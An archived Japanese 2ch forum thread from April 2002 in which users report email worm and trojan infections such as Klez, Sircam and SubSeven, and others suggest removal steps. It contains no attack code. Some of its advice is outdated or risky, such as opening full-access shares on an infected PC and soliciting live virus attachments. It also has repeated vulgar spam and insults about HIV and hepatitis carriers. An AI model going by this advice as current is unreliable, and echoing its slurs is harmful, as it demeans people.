474 :458:02/04/20 16:56
>461さんのリンク先に書かせていただきましたので、
何かご存知の方いらっしゃったらお願い致します。
>>467
ありがとうございます!
スキャンエンジンとかよくわかりません‥
タスクとは左下の事ですか?
そこにはウイルススキャンのアイコンはありません。
マルチになってしまうので消えます(汗

475 : :02/04/20 22:23
チェルノブイリことCIHの発病日が近くなってきました。
ウィルススキャンしましょ。
マザーボードのBIOSから破壊されることもあります。


476 :kkkk:02/04/20 22:31
http://www.geocities.co.jp/Bookend-Ango/2352/

477 :名無しさん@お腹いっぱい。:02/04/20 22:47
ヲイ聞いてくれよ
(C) 2002, ORICON CO.,LTD. All Rights Reserved.ってタイトルのメールの添付ファイル開けちったら、
Nortonシリーズがすべて起動しなくなった。
これってウイルスじゃねーの?なんでロリじゃなかったオリコンなの。みんな気をつけとけv
どっか修復ファイルねーの?まじで死ぬぎゃ
誰か愛の手をへるぷみー


どこにもないし(@@;)


478 :cheshire-cat:02/04/20 22:52
>>477
スタート→検索→ファイルで、添付ファイル開けた直後に出来たファイルを書いて味噌。

KLEZとか、アンチウイルスソフトの機能を停止させるvilliかと。
というか、トレンドマイクロのオンラインスキャンなら、Active Xコントローラーから動かすから利用可能だけど。
でもスキャン中に、villiのメールを送付するかもね。
メーラーのアドレス帳を空にしてから実行してみそ。

479 :名無しさん@お腹いっぱい。:02/04/20 22:54
>>477
このへんからどーぞ。
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.removal.tool.html
http://www.trendmicro.co.jp/klez/tool.asp

480 :名無しさん@お腹いっぱい。:02/04/20 22:59
っつか検索の画面すら出なくなっちまったよ
かわいい犬が一匹いるだけだw
XPなんてつかってるからかよ!オンラインスキャンさえできないし
普通ならメール開けたときにアンチウイルス起動するはずなのに
起動せんかったっつーことはまだ発見されてないんじゃないの?
つかいものにならんなSymantecさんよ
ちなみにウイルス定義は最新ですよ

481 :cheshire-cat:02/04/20 23:03
>>480
復元ポイント。

482 :名無しさん@お腹いっぱい。:02/04/20 23:08
(C) 2002, ORICON CO.,LTD. All Rights Reserved.
というタイトルのウイルスについて情報求ム

483 :cheshire-cat:02/04/20 23:18
>>482
というか件名は、感染元のローカルのファイルから抽出した文字列を使っただけのような気が。

484 :429:02/04/21 07:24
>433
レスありがとうございます。
でも、あれから即効バックアップとって再セットアップしてしまって。。。

485 :名無しさん@お腹いっぱい。:02/04/21 10:33
知り合いがウイルスに感染してしまいました。
その人はマカフィー入れてるんだけど感染後ウイルススキャンのexeが消されたそうですw
再インストールしてもすぐexeは消されるらしいんです。
他の症状は、MSNエクスプローラーが使用出来なくなり、アドレス帳に登録してる
人にウイルスをばらまいてるみたいです。
添付ファイルを削除したから添付ファイル名がわかんないんですがこういった症状のウイルスの話
聞いた事あります???
今添付ファイル名を確認してもらってるのでわかったら書き込みます。
知ってる人いたら教えてください!!

486 :名無しさん@お腹いっぱい。:02/04/21 10:42
>>485
KLEZ.Eかな? 亜種が多いので良くわからん。
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e@mm.html
専用スレ
http://pc.2ch.net/test/read.cgi/sec/1018248786

487 :名無しさん@お腹いっぱい。:02/04/21 10:59
>486
ありがとうございます!!
どうもそうみたいですね。
でも、最悪な事にすでにパソコン起動しなくなって再インストール中らしいです。
その再インストールも出来ないようですがw
情報どうも!!

488 :cheshire-cat:02/04/21 11:15
>>487
というか。
そこまで逝ったら、データファイル救出後に、フォーマットしてからクリーンインストールっしょ。

489 :名無しさん@お腹いっぱい。:02/04/21 11:39
見覚えのないアドレスからメールがきて、開けてしまいました・・・。
件名:Deskjet 882C
添付ファイル:ATT00004.txt
というメールでした。
いきなりなにかダウンロードしたみたいなんですが、
それ以後、CPU使用率が100%になってしまいます。
(10秒おきぐらいに)
今わかることは、知らないアドレスのドコモの携帯に
height.exeというファイルを添付して送ってしまっていたこと、
タスクマネージャーを見るとWinkpla.exeというのが、
CPU使用率100%になるということぐらいです。

これは、なんかヤバイウイルスに感染したのでしょうか。
なにか対処法はありますでしょうか?

490 :名無しさん@お腹いっぱい。:02/04/21 11:43
>>489
オンラインウイルスチェックしてみ

491 :名無しさん@お腹いっぱい。:02/04/21 11:50
>>489
「ワームはサービスとして起動されるのでCTLR+ALT+DELのタスクマネージャー上には
実行中のプログラムとして表示されません。」

おあいにくさま

492 :cheshire-cat:02/04/21 12:00
>>489
KLEZ系っしょ。
スタート→regeditから、「Winkpla.exe」ってサブキーがあるか検索して、片っ端から削除。
Safe Modeで起動して、Winkpla.exeを削除。
それからどっかでアンチウイルスソフトの体験版でもDLして、検出&削除しれ。

コレクション再開したんで、気が向いたら漏れに下さい。

493 :名無しさん@お腹いっぱい。:02/04/21 12:08
>>490
Trend Microというところでやってみましたが、
普段使っているexeファイル含めて50個ぐらいでました。
これ全部感染してるということですか?

>>491
初心者ですので詳しいことはわかりませんが、
ワームというウイルスなんですかね?


494 :名無しさん@お腹いっぱい。:02/04/21 12:21
>>492
レスどうもです。
regeditにLEGACY_WINKPLAというのがあるんですが、
これを消すってことでしょうか?削除できませんってでますけど・・・。
それと、サブキーとかわかりません・・・。

495 :cheshire-cat:02/04/21 12:25
>>493
>普段使っているexeファイル含めて50個

こういう事。
>ワームは各種アプリケーションの構成モジュール(EXEファイル)をウイルスコードで上書きして感染する場合があります。

というか、メールの添付ファイル、下さい。

496 :cheshire-cat:02/04/21 12:31
>>492
削除できない、か。。。SafeModeから、って手もあるのかな。まあいいや。

あのですね。
あらゆるアプリがもうハカーイされてます。だからウイルス感染ファイル削除後に、全てのexeファイル等を再導入しる必要がありまして。
ATOKやIMEのユーザー辞書、メーラーのアドレス帳とメール、ブラウザのお気に入り、そしてその他のデータファイルをMOにすぐコピーするようお勧めします。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
とりあえず上記のURLから「3288fix_klezV310.com」を拾ってきて、実行しれ。


497 :インターネット=ソープランドのマンコ:02/04/21 13:22
ナマでパコパコ!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートン買え!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!

498 :Nightfly:02/04/21 13:34
Klezに感染したマシンで、OutlookExprerssアカウント設定の「POPサーバアドレス」「(POPサーバ)ログイン名」が書き換えられている現象に出くわしました。
これってKlezの仕業なのでしょうか?、それとも他の作用?
ワクチンベンダーサイトではそれらしき情報を見つけられなかったのですが...

499 :名無しさん@お腹いっぱい。:02/04/21 14:13
>>498
メアドを吊るすときはfusianasanしなさい。

ウイルスバスターは書き換えることがあるけど。
とにかく感染したら再インストールして、パッチを当てなおす。

500 :Kitty Guy:02/04/21 14:17
会社の同僚からメールで相談を受けたのだが、
「"a special powerful tool" という添付の付いたメールが
会社の某重役から届いた」
とのこと。

>>338-339 で概出の「powerful tool」と同一のウィルス(?)
らしいが、トレンドマイクロやシマンテックのページを見ても
見つけられませんでした。
同僚も「ウィルスだと怖いから開いていないよ」と書いている
から、とりあえず急を要する事態ではないのですが、どんな
ウィルスか判らないと気持ちが悪いし、某重役のPCが感染している
となると、システム部門に対応を依頼する必要があるので、何か
詳細をご存じの方はご教示いただきたく、よろしくお願いします。

501 :cheshire-cat:02/04/21 14:25
>>500
件名がランダムな文字列の組み合わせだからじゃないのか?
「a * * tool」っしょ。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G&VSect=T

KLEZ系はネットワーク(というかLAN)感染するよ。
OS入ってるドライブをフルアクセスの共有にしている奴は、簡単に壊滅する。

502 :cheshire-cat:02/04/21 14:27
ちなみに漏れが似たようなのがあるのにKLEZ系だと判断したのは、今の流行だからっす。

503 :Kitty Guy:02/04/21 14:42
>>501-502
早速の回答ありがとうございます。

504 :名無しさん@お腹いっぱい。:02/04/21 14:49
みなさんに質問したいのですが
昨晩変なメールが届いてそれを開いて以来
WINを立ち上げるたびに
「プログラム開始エラー
メモリ不足のため・・・・・・を読み込めませんでした」
と表示されノートパソコンがメモリの使いすぎで熱くなったり
ネットにつなぐと勝手にどっかとアクセスしてるらしくランプが
点滅したりしています
これってなんのウィルスですか。

505 :名無しさん@お腹いっぱい。:02/04/21 15:18
変なアドふんでからメールの送信とかの項目が表示されなくなりました〜!!
ファイルからは送信できるようなのですが、
これは何かのウィルスに感染してるのでしょうか?
また、ウィルス感染の場合は初期化しなければ解決できないのでしょうか?
誰か教えてください〜!

506 :cheshire-cat:02/04/21 15:18
>>504
存じません。
それだけの情報では、誰も何も答えられないでしょう。

507 :名無しさん@お腹いっぱい。:02/04/21 15:33
>>505
ウイルスチェックをしろ。その書き込みだけじゃ限定できない。

508 :名無しさん@お腹いっぱい。:02/04/21 15:43
ウィルスチェックってどうやるんですか

509 :505:02/04/21 16:05
MCAFEE VirusScan初めて使ったんですけど
取りあえずスキャンしても普通に終わりました。
このままメール送信したらその人にウィルス感染させちゃうかな〜?

510 :名無しさん@お腹いっぱい。:02/04/21 16:06
もしわかる人がいましたら教えてください。
現象に関しては>>504 と同じ現象です。
現象後はハードディスクのアクセスも頻繁に行われるようになり(仮想メモリへのアクセスか?)
処理自体もかなり重たくなっています。
対象ファイルをウィルスバスター2002体験版で検索したところウィルスではない
と判定されています。
ウィルスによる情報漏えいが怖いのでオンラインスキャンは行えない状態です。
もし同じ現象で対処された方がいましたら対象法を教えてください


511 :名無しさん@お腹いっぱい。:02/04/21 16:12
>>510
体験版じゃパターンが古いからだめ。

512 :cheshire-cat:02/04/21 16:13
>>510
該当するメールの件名、本文、添付ファイル名、添付ファイルのサイズ、OS、起動しているプロセス名は?

513 :cheshire-cat:02/04/21 16:16
>>510
こんな手もある。
未感染PCにアンチウイルスソフト導入して、検索エンジンと定義ファイルを最新にする。
共有を、フルアクセス(書き込み可能)にしないでおく、絶対。

感染PCの共有を、全てのドライブでフルアクセスにする。

それぞれをクロスケーブルで直接接続。んでスキャン。

514 :510:02/04/21 16:39
>>511-513
情報ありがとうございます。
自宅のパソコンが使えない為ネットカフェより書き込みをしておりますので
添付ファイルの詳細(サイズなど)はわかりません。
今わかっている情報は
OS:windows98
メーラー:ベッキー2.0
件名:Please try again
添付ファイル:mirabix[1].exe
本文:よくわからない英文字が羅列
です。

※PCは1台のみのためLANでの検索はできません



515 :cheshire-cat:02/04/21 16:50
>>514
トレンドマイクロのKLEZ.Gの<詳細>ページに、その件名が記載されていますね。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G&VSect=T

各種の症状が一致するならば、<概要>ページの「3288fix_klezV310.com」(Ver.3.10)を試したらどうでしょうか。

それと、KLEZ.Gは(挿入型か上書き型かは不明ですけど、EXEファイルに感染します。
ということで、自宅PCの各種アプリケーションは(KLEZ.Gならば)お亡くなりになってるかも。
駆除後にこれらのEXEファイルも一緒に削除されるかもしれません(試してないけど)。
その場合は、各種アプリの再インストが必要だと思います。

またネットワークから切り離したという処置は、犠牲者を増やさないための適切な処置でしたね。

516 :510:02/04/21 17:00
>>515
ありがとうございました。
重要なファイルがありませんのでフォーマットと再セットアップを行おうと
思います。

517 :cheshire-cat:02/04/21 17:23
>>516
IMEのユーザー辞書とか、救出してMOに入れた方がいいですよ。
それとKLEZ.Gを実験パソに感染させて挙動を観察したいんで、もし気が向いたら添付ファイルを下さい。

518 :名無しさん@お腹いっぱい。:02/04/21 18:46
いましがた
FPIIF J3R.bat 79.7KB
FPIIF J3R.doc 506KB
メールの容量783KB
ヘッダーに
Comments:
Comments:
Comments:
Comments:
Comments:
と5行の謎の英語。
送られてきたアドレスはOCNのサーバーを使っている人みたいです。

どんなのか分りますでしょうか?


519 :名無しさん@お腹いっぱい。:02/04/21 19:33
>518
添付ファイル名からみてなんとなくKlezな気が。

520 :名無しさん@お腹いっぱい。:02/04/21 21:43
これで4通目だ
--Z95s7703769Y99w3Os7v861a1okkN8LD36iy
Content-Type: application/octet-stream;
name=Web.exe
Content-ID: <U3ppQ104R439s48D2>
Content-Transfer-Encoding: base64
↑これってワーム?毎回メアドが違う。でも
Received: from newford.it.uu.net (newford.it.uu.net [212.4.0.14])
こんなふざけたドメインから来てるんだよなあ…

521 :名無しさん@お腹いっぱい。:02/04/21 22:17
オンラインウィルス検索で見つかったTROJ_OPENME.Bというウィルス。
どんなものか検索して調べてみたんだけど英語で書かれていて
わかりません。どなたか分かる人いますか?↓検索結果
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_OPENME.B


522 :名無しさん@お腹いっぱい。:02/04/22 00:49
ポップアップ広告が出るんだってー

523 :名無しさん@お腹いっぱい。:02/04/22 08:55
IDOL TOP 100っていうメールが来るんだけど・・・・・・
Scrの添付付きで121KB・・・・・。
即効削除したけどどっからきてるんだか恐くて開けなかったんだけど。

524 :名無しさん@お腹いっぱい。:02/04/22 09:46
差出人gem 件名HEIGHT ウイルスらしいんですが、すぐ削除しました。
なにこれ?

525 :名無しさん@お腹いっぱい。:02/04/22 10:09
この2つのサイト あやしそうだけどウイルスとか感染するのかな?

ttp://www.subculture.com/sexparty.html
ttp://paranoiacwww.jimpunk.com/__________/paranoiac.shtml

526 :名無しさん@お腹いっぱい。:02/04/22 12:56
つまらない質問でスミマセン。
Whiterとやらを実行してしまった場合、ファイル復活ソフトを
使用しても無駄なのでしょうか?

このようなソフトを購入しようと思っています。
http://www.finaldata.ne.jp/finaldata.html

レジストリにWhistler %System%\whismng.exe -next
もなかったので、既に実行済みということみたいですが・・・

527 :名無しさん@お腹いっぱい。:02/04/22 13:15
>>526 発病症状
>W32.Whiter.Trojan が発病すると、ハードディスク上にあるファイルす
>べての削除を開始します。ファイルごとに、内容を0バイトのデータに書
>き換え、その後ファイルを削除します。これにより、特殊なツールを使わ
>ない限り、データの復元が非常に困難になります。

一旦内容を書き換えた後に削除しているので基本的に復活不能と思ってよい。
上記ソフトが「特殊なツール」に当たるのかは知らぬ。

528 :名無しさん@お腹いっぱい。:02/04/22 15:46
>>526 マルチ?http://tmp.2ch.net/test/read.cgi/download/1019446859/l50

529 ::02/04/22 16:22
Download
【復活希望!】実行後、全HDDを消去、削除される
http://tmp.2ch.net/test/read.cgi/download/1019446859/


530 : :02/04/22 16:28
もせとjpgが全部スクリプトファイルに書き換えられたぁーーーー!!!
お宝画像がぁぁぁーーーーーーー!!ヽ(`Д´)ノ ウワァァン

531 :名無しさん@お腹いっぱい。:02/04/22 16:28
>>529 直前すら読まずに書き込んでるのか。ここへはもう来るな。

532 :名無しさん@お腹いっぱい。:02/04/22 16:30
初心者ですが、ウイルス対策はどのソフトがいいのでしょう?
ウイルスバスター、ノートン・・・悩んでます。
低価格で使いやすいものが希望です。性能はどこも似たりよったりですか?

533 :名無しさん@お腹いっぱい。:02/04/22 16:38
>>532 雑誌なんかに散々書かれているだろう。
ウィルス定義のアップデートのしやすさでノートンアンチウィルスを薦め
ておく。

534 :名無しさん@お腹いっぱい。:02/04/22 17:06
>>466さんと同じ、差出人不明・件名が「Border」のメールが来た!
やっぱりウイルスかなぁ?捨てちゃおう。

535 :名無しさん@お腹いっぱい。:02/04/22 18:20
件名・・・RedMeasure V4
添付ファイル名・・・tv-asahi.co[1].pif

今日の午後くらいからやたらこんなメールが来ます。
送信元は取引先など。これ、何ですか?

とりあえず私はMac使いなんですけどね。

536 :名無しさん@お腹いっぱい。:02/04/22 18:30
>>533
ありがとう

537 :名無しさん@お腹いっぱい。:02/04/22 18:38
普段あまり使わない社内用メール1つだけに、今日だけで怪しいメールが3件きました。
件名が、「How are you」で、添付ファイルが、celeb2[1].pif というのと、
件名が、「Re:How are you」で添付ファイルが、ALT.scr
件名が、「Fuckyou()」で、添付ファイルが、the[1].bat
というのです。
恐らく、一度だけ載せた某掲示版のメールから来たのかもしれません。
一応、私はMACなので、大丈夫かと思いますが、これらのウイルス(?)に
心当たりのある方はいませんか?
今日だけ、何故??って感じで、無気味です。

538 :名無しさん@お腹いっぱい。:02/04/22 22:28
>>537
http://www.symantec.com/region/jp/sarcj/data/w/w32.sircam.worm@mm.html

サーカムっぽいね。マックには影響ありません。


539 :名無しさん@お腹いっぱい。:02/04/23 00:15
昨夜から今日にかけて6通の怪しげなメールが届きました。
webメールのアドレスを某掲示板に書き込んだので
そこが原因というのはまちがいないですが、そこから先は??
ひやかしメールは来てないし「ウイルスを送ろう!」的なサイト
又は掲示板が存在するのでしょうか?

差出人が違う6通のメール(3通に関しては発信元アドレスが明確です。)
【件名】
Hi,spice girls' vocal concert
LANGUAGE ←2通
A powful tool
END XXXCOUNTER.COM CODE
A special excite game


540 :cheshire-cat:02/04/23 00:20
>>539
KLEZ。

541 :名無しさん@お腹いっぱい。:02/04/23 00:37
218.217.51.137

富士通のサイト?、Nimdaに感染してない?
アクセスログ見たら、やたらとポートスキャンらしき形跡が……。


542 :cheshire-cat:02/04/23 00:41
>>541
踏んだ。削除失敗した。Nimda.Aだった。
悲しいので寝る。

543 :名無しさん@お腹いっぱい。:02/04/23 00:43
>>542
アンチウィルスの最新定義入れてないの?(汗


544 :名無しさん@お腹いっぱい。:02/04/23 00:58
>>541
富士通運営ではあるが、InfoWeb だべ

545 :名無しさん@お腹いっぱい。:02/04/23 01:05
>>544
今Whoisしてみたらそうみたいね。
ちょっと厨な質問申し訳ないんだけど…
とりあえず踏んでみたらノートンで
「ファイルは修復されました」
「このファイルは修復できません」
「ファイルへのアクセスが拒否されました」
の3通りのレポートが見れたんだけど、
これは、PCに被害はなかったと思っていいのかな?


546 :名無しさん@お腹いっぱい。:02/04/23 01:24
脳豚ってやつは、妙なメッセージを吐くようだなぁ。o
「ちょっと経過観察しましょう」
ってやぶ医者のようだ(w
こっちは、Java, JavaScript オフで、ActiveX 不能なんで、
にんともかんとも…

547 :545:02/04/23 01:27
>>546
そうですか……。
とりあえず、最新定義ファイルを使ってのスキャンに
引っかからないので、問題ないと思うことにします。


548 :kazy:02/04/23 02:05
はじめて2chにカキコします
先程、MXで落とした
(アプリ)WinMX 強制DLパッチ(こっそりとDOMできる)(・∀・)イイ!! .lzh 
53.395バイト というファイルをEXPLZHから解凍しようとしたら
ノートンISが作動して検疫しました。
ウィルスプログラムなんでしょうか?
今から 落としてはいけないリストを探しに行ってきます(^^;)

549 :kazy:02/04/23 02:17
あ、すいません、548の結果報告です。
そのzipファイル内にはReadme.txtと実行ファイル(名前忘れた(^^;))が
あったんですが、TXTは普通に読めました。
実行ファイルを解凍しようとすると、ノートン作動。
調べたらBacdoor.SubSeven22(トロイの木馬)でした。
その後、検疫→削除し、もう一度ノートンでそのZIPファイルをスキャンし
ました。初めてのウィルス体験だったんで保存しようと思ってたんですが
再起動後そのZIPファイルを見ると、Readme.txtファイルだけ残ってて
実行ファイルは削除されてました(^^;) ノートンちゃんと仕事してます(笑)


550 :名無しさん@お腹いっぱい。:02/04/23 02:20
今、ハブアナイスデイという名前のウイルスに感染しました。
漏れのウイルスバスターはそのファイルを隔離したんですけど
削除はできないのですか?

551 :550:02/04/23 02:26
ファイルのJS_SPAWNという名前でした・


552 :インターネット=ソープランドのマンコ:02/04/23 02:39
インターネット=ソープランドのマンコ

ナマでパコパコやるな!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートン買え!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!

553 :cheshire-cat:02/04/23 07:13
>>543
>アンチウィルスの最新定義入れてないの?
やっとりますが、当然。

「ファイルを開かないでスキャンを続ける」、にすればいいだけなんだけど。

554 :名無しさん@お腹いっぱい。:02/04/23 13:45
なんか昨日から突然、変なメールばかり、どこかの掲示板から流出しているのだろうけれど、一体なんなんだ。
件名 : A excite game
添付ファイル : plat.exe
This is a very excite game
This game is my first work.
You're the first player.
I wish you would like it.

と、本文メッセージ。
課金システムか、ウイルスかしらんが、当方MACにつき、まるで意味なし。
他にも同じメール受けた人います?

555 :名無しさん@お腹いっぱい。:02/04/23 13:51
>>554
Klezのスレッドを読みなされ

556 :名無しさん@お腹いっぱい。:02/04/23 14:42
>>554
件名は"A"なんだね、"An"ではないのね?

557 :名無しさん@お腹いっぱい。:02/04/23 15:34
もし、お知恵を拝借できればと思ったので書き込みさせてください。
数日前に、MAILER-DAEMONから送信エラーが何通かとどきました。
いずれも私が送ったメールについてのエラーではなく(家族でもありません)
送信先は全く知らないアドレスで、しかも私と同一プロバイダのものです。
アカウントを適当な名前にしているようです。
最初、私のメールアドレスを使って誰かがメールを送っているのかと思い
プロバイダにメールで問い合わせてみましたが
サポートの方にも同じメール(エラーメール)が届いたという事
私のPCがウイルスに感染しており、勝手にメールが送られているのではないか
という主旨の返事がとどきました。
そこで、オンラインスキャンをかけてみましたが、なにも検出されません。
これは本当にウイルスかどうか、よろしかったら情報をください。
成りすましメールという疑いを捨て切れていないのです。
私のPCはWin95でメールソフトはOE4.72(バージョン情報に書いてありました)
IE4.01を使っています。
古いですケド。

558 :557:02/04/23 15:35
エラーメールの内容です

Hi. This is the qmail-send program at (エラーメール送信元)
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<○○○@×××.ne.jp>:
Sorry, no mailbox here by that name. (#5.1.1)

--- Below this line is a copy of the message.

Return-Path: <私のアカウント名>
Received: (qmail 25967 invoked from network); 18 Apr 2002 16:28:18 +0900
Received: from unknown (HELO ming21) (61.149.25.8)
by (メールサーバー名) with SMTP; 18 Apr 2002 16:28:18 +0900
From: (私のアカウント名)
Subject: Advertisement
To: ○○○@×××.ne.jp
Content-Type: multipart/alternative; boundary="=_NextPart_000_0018_01C1A1B3.E2C7FE20"
MIME-Version: 1.0
Date: Thu, 18 Apr 2002 15:24:35 +0800
X-Priority: 3
X-Library: Caretop Library
X-Mailer: CSM2.8

This is a multi-part message in MIME format

--=_NextPart_000_0018_01C1A1B3.E2C7FE20
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

=D5=E2=CA=C7=D2=BB=B8=F6HTML=B8=F1=CA=BD=B5=C4=D3=CA=BC=FE

--=_NextPart_000_0018_01C1A1B3.E2C7FE20
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><FRAMESET border=3D0 frameBorder=3D0 frameSpacing=3D0=
rows=3D100%,*><FRAME marginHeight=3D5 marginWidth=3D10 name=3Deasymain =
src=3D"http://www.ming21.net/私のアカウント名と同一/"></FRAMESET>

--=_NextPart_000_0018_01C1A1B3.E2C7FE20--

559 :557:02/04/23 15:36
以上です。

エラーとなって帰って来た送信先は
全て私が使っているメールと同じプロバイダのものです。
同内容のものが、送信先のみ変わって7〜8通届いています。
また、最後の
http://www.ming21.net/私のアカウント名と同一
というURLには心当たりもなく、怖いのでクリックしていません…

どちらにしろ、今後のためにウイルス駆除ソフトか新しいPCは買おうと思っていますが
事情があって外に出られないため、
取り急ぎここで質問させていただくことをお許しください。
長文すみませんでした。

560 :557:02/04/23 15:38
追記。ちなみに知り合いからでもいきなり添付ファイルなどは開きませんし
ここ1週間ほどはアンケートなどの企業メールばかりだったので
読まずに削除したりしていました。

561 :名無しさん@お腹いっぱい。:02/04/23 15:59
>いきなり添付ファイルなどは開きませんし、
IE使っている以上、「添付ファイル開かない」は防御にはならない。認識が古い。プレビューも危険。
ましてIE4だともはやどんなセキュリティホールがあるのかも調査されていない。
http://www.ipa.go.jp/security/virus/faq/qa_a.html#2-1 のQ1
例えば、http://www.microsoft.com/japan/technet/treeview/default.asp?url=/JAPAN/technet/security/bulletin/ms01-020.asp など

自身が感染してないのを前提にレスすると誰かがKlezに感染していてワームが
あなたのアドレスを詐称して発信したものがあて先不明であなたに返されたもの
と推測される。
http://www.trendmicro.co.jp/klez/


562 :名無しさん@お腹いっぱい。:02/04/23 16:26
>>561 どうしてもWin95でいきたいのなら、せめてIE5.01SP2にする。
ただしIE5.01SP2もWin95用のものは最新パッチは供給されていない。
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
↑でダウンロードした上でウィンドウズアップデートで「製品の更新」の
「重要な更新」で修正パッチを当てておく。
IE6.0やIE5.5SP2はWin95には対応していない。

563 :インターネット=病原菌の宝庫 :02/04/23 16:36
インターネット=病原菌の宝庫
パソコン=何も対策してないあなた

それでもあなたは、わざわざ病気にかかりに行きますか?
知らないうちに加害者になりますか?

ノートン、バスターを買って予防しましょう。
そして、新しい病原菌に対応するため、ウイルス定義を最新にすることも忘れずに。

564 :インターネット=ソープランドのマンコ:02/04/23 16:37
ナマでパコパコ!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

ノートン買え!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!
ウイルス定義を最新にしろ!!!!!!!!!!!!!!!!!!!!

565 :名無しさん@お腹いっぱい。:02/04/23 16:44
>>563-564 わっ、わかったからソープランドを貶めるのはやめてくれ(w
素人渋谷系の方が保菌率はるかに高いんだから…

566 :貶める?:02/04/23 17:04
読み方が分かりません。
−−−−−−−−
やめません。
このくらい言わないと重大さが解らないと思います。
ウイルス対策をしないのはチンコにゴムつけないのと同じです。

ソープランドで淋、蔵くらうことがあります。
別にスレがあります。

567 :おとしめる:02/04/23 17:08
くらったのか…



568 :557:02/04/23 17:10
>>561
>>562
レスありがとうございます。さっきまで561のリンク先や
IEについて検索して調べてみました。
なりすましであるという可能性ばかりじゃないようで、安心半分コワー半分です。
お下がりのPCということもあり、既存の環境に甘んじてるところもありましたので
いっそPCごと買い換えようと思ってます。ワクチンソフトも買ってもらってきます。
このPCはもう回線を切ってオフライン専用とすることにしました。
ありがとうございました。


569 :ノートンの回し者か?:02/04/23 18:45
自分だけが無菌だとでも思ってるのか?
この肝炎キャリアめ!

(脱線スマソ)

570 :馬鹿ヒーの回し者か?:02/04/23 19:21
自分だけが無菌だとでも思ってるのか?
このHIVキャリアめ!
自分だけが無菌だとでも思ってるのか?
このHIVキャリアめ!
自分だけが無菌だとでも思ってるのか?
このHIVキャリアめ!
自分だけが無菌だとでも思ってるのか?
このHIVキャリアめ!
自分だけが無菌だとでも思ってるのか?
このHIVキャリアめ!


571 :cheshire-cat:02/04/23 19:29
>>570
HIVは菌ではない。どうでもいいんだが。

572 :名無しさん@お腹いっぱい。:02/04/23 19:51
エロ画像付きのウイルスがやたらくるよ

573 :名無しさん@お腹いっぱい。:02/04/23 19:58
>>619 Klezは感染発信元が偽装されてるからまだマシだけど、そのままの
アドレスで自分のお宝画像がばら撒かれたら恥ずかしいよなぁ。
あいつこんな趣味してたのかって。MOに保存しようね、お宝は(w

574 :573:02/04/23 19:59
スマソ 619ではなく >>572だった。

575 :名無しさん@お腹いっぱい。:02/04/23 20:07
>>565
話し掛けるのやめれ。
透明あぼーんか放置しる。

576 :名無しさん@お腹いっぱい。:02/04/23 20:57
>>548-549
MX厨はダウソ板に帰れ。

577 :名無しさん@お腹いっぱい。:02/04/23 23:19
初心者です・・・優しく教えてください・・。

 えっと、アウトルックでメールを受信する時に、プレビュー
画面でメールを見ないようにする方法があと聞いたのですが
(開かなくても読んだだけで感染するメールがあると
聞いたので・・)教えてください。
 ちなみに、ただいま件名「version」という添付ファイル
付きメールがきていて、怖くて開けていません・・。
 これって・・・?

578 :名無しさん@お腹いっぱい。:02/04/23 23:26
>>577
[ツール]->[オプション]->[読み取り]->"プレビューウィンドウで表示する・・・"
のチェックを外す。



579 :cheshire-cat:02/04/23 23:26
>>577
ダイレクトアクション機能:
アウトルックエクスプレスでプレビューだけで、アウトルックでメールを開くだけで、添付ファイルが実行、です。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020

表示→プレビューウィンドウ→プレビューできなくなって、幸せになれる、かもしれない。

580 :名無しさん@お腹いっぱい。:02/04/23 23:33
>>577
文面からすると、既にプレビューしてるような気もするんだが・・・

581 :名無しさん@お腹いっぱい。:02/04/23 23:35
すいません。質問です。
以下のメールが来ました。いったいなんなのでしょう。
月曜にはメールを送っていません。

タイトル:Returned mail: Unknown user
送信者:Postmaster@mail.nifty.ne.jp <Postmaster@mail.nifty.ne.jp>

----- Unsent reason follows -----
czw6016@nifty.ne.jp... Unknown user

----- Unsent message follows -----

Return-Path: sin-h@mx3.ttcn.ne.jp
Date: Mon, 22 Apr 2002 20:45:36 +0900
From: xxxxxx <xxxxxx@xx.xxxxx.xxx> <−オレのアドレス
To: CZW6016@nifty.ne.jp
Subject: Vc layer
Received: from mta4p.ttcn.ne.jp (mta4.ttcn.ne.jp [210.188.175.73])
by ums514.nifty.ne.jp (8.9.3+3.2W/3.7W001208) with ESMTP id UAA22433
